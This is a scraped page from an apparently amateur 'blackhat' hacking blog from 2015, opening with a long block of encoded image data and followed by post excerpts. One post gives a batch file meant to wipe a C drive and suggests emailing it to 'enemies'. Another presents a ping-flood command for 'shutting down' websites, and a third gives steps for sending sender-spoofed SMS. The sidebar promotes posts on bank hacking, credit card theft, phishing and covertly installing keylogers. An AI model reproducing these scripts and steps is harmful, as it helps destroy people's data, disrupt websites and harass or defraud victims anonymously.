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
The NMAP is the foremost software which acquires the top position in every list of best hacking software. It’s the best security scanning and hacking tool and ease of use. The NMAP offers a wide range of features like finger-printing, port scanning, ping, OS detection, IP range and alive hosts etc. its the most recommended tool for the new and advanced learners of hacking.
Read more »
Posted by Unknown at 18:19 58 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Wednesday, 24 June 2015

XSS ATTACK!

Cross-Site Scripting (XSS) vulnerabilities are very often misunderstood and not given the due
concern and attention they deserve by vendors. XSS is the preferred acronym for “Cross-Site
Scripting” simply to minimize the

Read more »
Posted by Unknown at 05:35 2 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Top five hacking Tools for Security Assessments

Top five hacking Tools for Security Assessments and Penetration Testing
Chey Cobb, CISSP
You’re called to do a security assessment on a network for a client, and the obvious
question arises:
Which security assessment tools do you bring? Sadly, while there are
literally hundreds of penetration testing and security assessment tools from which to
choose, no single tool will do a complete job.
Read more »
Posted by Unknown at 05:20 2 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

HOW TO CREATE A SIMPLE VIRUS

How to Make the virus ?

1. Open Notepad and copy below code into it.

@Echo off
Del C:\\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.

Warning: Please don\'t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer...!!!!!!!!!!!


NOTE: You can send it to your enemies through email as attachment :) LOLZZ
BROXKEY!!
Posted by Unknown at 05:04 1 comment:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

DOMAIN HIJACK!

I am BROXKEY!!......
To hijack a domain name, it�s necessary to gain access to the domain control panel of the target domain.
For this you need the following ingredients The domain registrar name for the target domain.
The administrative Email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain.

Read more »
Posted by Unknown at 04:56 2 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

SHUT DOWN SMALL WEBSITES WITH COMMAND PROMPT

How do you shutdown a website with command prompt?
In: Microsoft Windows
Answer:
Go into command prompt and type in

ping youwebsitename.com


then it will have the ip address copy that.

ping -t theip -l 65000
Read more »
Posted by Unknown at 04:34 1 comment:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to send Anonymous SMS

SEND MSG WITH HIDDEN NUMBER

>> Have you ever thought of Messaging someone via SMS without your Phone Number Appearing?

Yes, Am sure one way or the other you would have thought of doing this..

This is a Short Tutorial on How to do that. Instead of Using Bulk SMS,

You can use this Method to Send Anonymous SMS to anybody.

Just Follow the Steps below:-

HOW TO SEND ANONYMOUS TO ANYBODY ON YOUR PHONE

1. Supposing you want Send an SMS to 07088927159,
Go to Message > Settings > Text message > Sms Sending Profile > Set the Option "Send Sms As" to "Email"

2. You'll be asked for Sms Server, Just put the Phone number you're hiding your Identity from into the Space eg. "07088927159", Just Save and Activate it.

3. Now, Go to Create New Sms, Then click Send, You will be asked for your email address, Put this without quotes "PQR @ ABC" where 'PQR' & 'ABC' is anything you want to be seen by ur Receiver. (You can write anything Inside, You might decide to use your Real Email Address).

4. Now Send the Message, You're done. Your recipient will receive message from "PQR @ ABC" without your number.
Posted by Unknown at 03:50 8 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Saturday, 20 June 2015

Gangsta signs




Posted by Unknown at 11:37 No comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Newer Posts Home
Subscribe to: Posts (Atom)

Add me on facebook

Mòoré Téflòn

Create your badge

BLACKHAT

BLACKHAT
Anonymous

Popular Posts

  • Hacking A Bank Account
    Bank Hacking Despite the risks involved, hacking a Bank is relatively easy. As long as you are fast, by following this guide y...
  • HOW TO HACK CREDIT CARD
    This tutorial is divided in two parts. Introduction into Credit Cards Credit card Hacking REMEMBER: WE ARE BLACKHAT! WE DO NOT FORGIVE!...
  • Top 5 Hacking Software Free Download for PC
    Top 5 Hacking Software Free Download for PC by BROXK...
  • How to Brute Force hacking Facebook in Kali Linux
    Hello all, Want to learn facebook hacking?  facebook hacking with  Brute force python scripting We need a tool: 1. Python Script - fa...
  • Facebook Phishing ( Undetectable)
    Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirect...
  • TOP TEN HACKER TOOLS LIST!
     The 2015 Concise Top Ten Hacker Tools List! This 'TOP TEN' is based on the Kali Linux Distro Hacker T...
  • Hack Wi-Fi with CMD
    Sometimes you might be frustrated especially when your system detect a wifi network but you are restricted from accessing it due to user...
  • Hack Facebook Account Using Phishing Method 2015
    Phishing. What is phishing and how is it done?? Phishing is the process of directing users to enter details into a fake website tha...
  • How to send Anonymous SMS
    SEND MSG WITH HIDDEN NUMBER >> Have you ever thought of Messaging someone via SMS without your Phone Number Appearing? Yes, Am sure on...

Anonymous

Anonymous

Search Box

About Me

Unknown
View my complete profile

Language Traslator

Subscribe Now

Posts
Atom
Posts
All Comments
Atom
All Comments

Anonymous

Anonymous
BLACKHAT

Hack

Hack
Black hat

Labels

  • Hacking Wi-Fi (1)
  • Phishing method 2015 (1)

Blog Archive

  • ▼  2015 (24)
    • ▼  October (2)
      • TOP TEN HACKER TOOLS LIST!
      • HOW TO HACK CREDIT CARD
    • ►  August (4)
      • How to create a blue screen of Death with Notepad
      • Delete Key Registry Files
      • How to create a virus that deactivates an OS
      • Top 10 Notorious Black Hat Hackers
    • ►  July (8)
      • Facebook Phishing ( Undetectable)
      • Hack Wi-Fi with CMD
      • Hacking A Bank Account
      • How to change your private IP address in Windows ...
      • How to Remotely Install a Keylogger onto Your Girl...
      • How to Hack Email Account with Cookie stealing [Fo...
      • How to Brute Force hacking Facebook in Kali Linux
      • Crack Online Passwords with Tamper Data & THC Hydra
    • ►  June (10)
      • HOW TO HACK EMAIL ACCOUNTS PASSWORDS
      • Hack Facebook Account Using Phishing Method 2015
      • Top 5 Hacking Software Free Download for PC
      • XSS ATTACK!
      • Top five hacking Tools for Security Assessments
      • HOW TO CREATE A SIMPLE VIRUS
      • DOMAIN HIJACK!
      • SHUT DOWN SMALL WEBSITES WITH COMMAND PROMPT
      • How to send Anonymous SMS
      • Gangsta signs
Powered By Blogger

White Hat vs Black Hat

White Hat vs Black Hat

Anonymous

Anonymous
Broxkey
Watch your back :). Simple theme. Powered by Blogger.